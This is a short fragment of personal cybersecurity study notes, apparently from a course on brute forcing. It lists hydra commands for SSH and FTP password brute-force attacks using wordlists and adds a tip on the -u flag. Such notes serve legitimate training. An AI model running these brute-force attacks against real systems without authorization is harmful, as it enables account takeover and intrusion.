GAB-QK/Perso-Cyber-Obsidian/Command SOS/Password/Introduction to Brute Forcing SC.md

 | `hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4` | SSH Brute Force - User/Pass Wordlists |
 | `hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1` | FTP Brute Force - Static User, Pass Wordlist |

+**Tip: We will add the "-u" flag, so that it tries all users on each password, instead of trying all 14 million passwords on one user, before moving on to the next.**
 # Wordlists

 | **Command**   | **Description**   |